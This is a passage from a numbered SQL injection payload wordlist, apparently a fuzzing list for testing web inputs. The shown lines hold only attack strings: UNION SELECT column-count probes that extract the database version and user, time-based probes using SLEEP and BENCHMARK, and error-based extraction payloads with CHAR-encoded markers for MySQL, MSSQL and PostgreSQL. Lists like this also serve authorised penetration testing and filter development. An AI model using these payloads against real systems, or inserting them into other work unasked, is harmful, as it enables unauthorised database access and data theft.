611 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
612 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
613 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
614 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
615 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
616 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
617 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
618 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
619 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
620 | UNION SELECT @@VERSION,SLEEP(5),"'3
621 | UNION SELECT @@VERSION,SLEEP(5),"'3'"#
622 | UNION SELECT @@VERSION,SLEEP(5),USER(),4#
623 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
624 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
625 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
626 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
627 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
628 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
629 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
630 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
631 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
632 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
633 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
634 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
635 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
636 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
637 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
638 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
639 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
640 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
641 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
642 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
643 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
644 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
645 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
646 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
647 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
648 | UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
649 | UNION ALL SELECT USER()--
650 | UNION ALL SELECT SLEEP(5)--
651 | UNION ALL SELECT USER(),SLEEP(5)--
652 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
653 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--
654 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--
655 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--
656 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--
657 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--
658 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--
659 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--
660 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
661 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
662 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
663 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
664 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
665 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
666 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
667 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
668 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
669 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
670 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
671 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
672 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
673 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
674 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
675 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
676 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
677 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
678 | UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
679 | UNION ALL SELECT NULL--
680 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--
681 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--
682 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--
683 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
684 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
685 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--
686 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
687 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
688 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
689 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
690 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
691 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--
692 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--
693 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--
694 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--
695 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--
696 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--
697 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--
698 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--
699 | UNION ALL SELECT NULL#
700 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
701 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#
702 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
703 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
704 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
705 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
706 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
707 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
708 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
709 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
710 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
711 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
712 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
713 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
714 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
715 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
716 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
717 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
718 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
719 | UNION ALL SELECT NULL
720 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
721 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
722 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
723 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
724 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
725 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
726 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
727 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
728 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
729 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
730 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
731 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
732 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
733 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
734 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
735 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
736 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
737 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
738 | AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
739 | AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
740 | AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
741 | AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
742 | UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--
743 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'
744 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
745 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
746 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
747 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
748 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
749 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
750 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
751 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
752 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
753 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
754 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
755 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
756 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
757 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
758 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
759 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
760 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
761 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
762 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
763 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
764 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
765 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
766 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
767 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
768 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
769 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
770 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
771 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
772 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
773 | UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
774 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
775 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
776 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
777 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
778 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
779 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
780 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
781 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
782 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
783 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
784 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
785 | UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
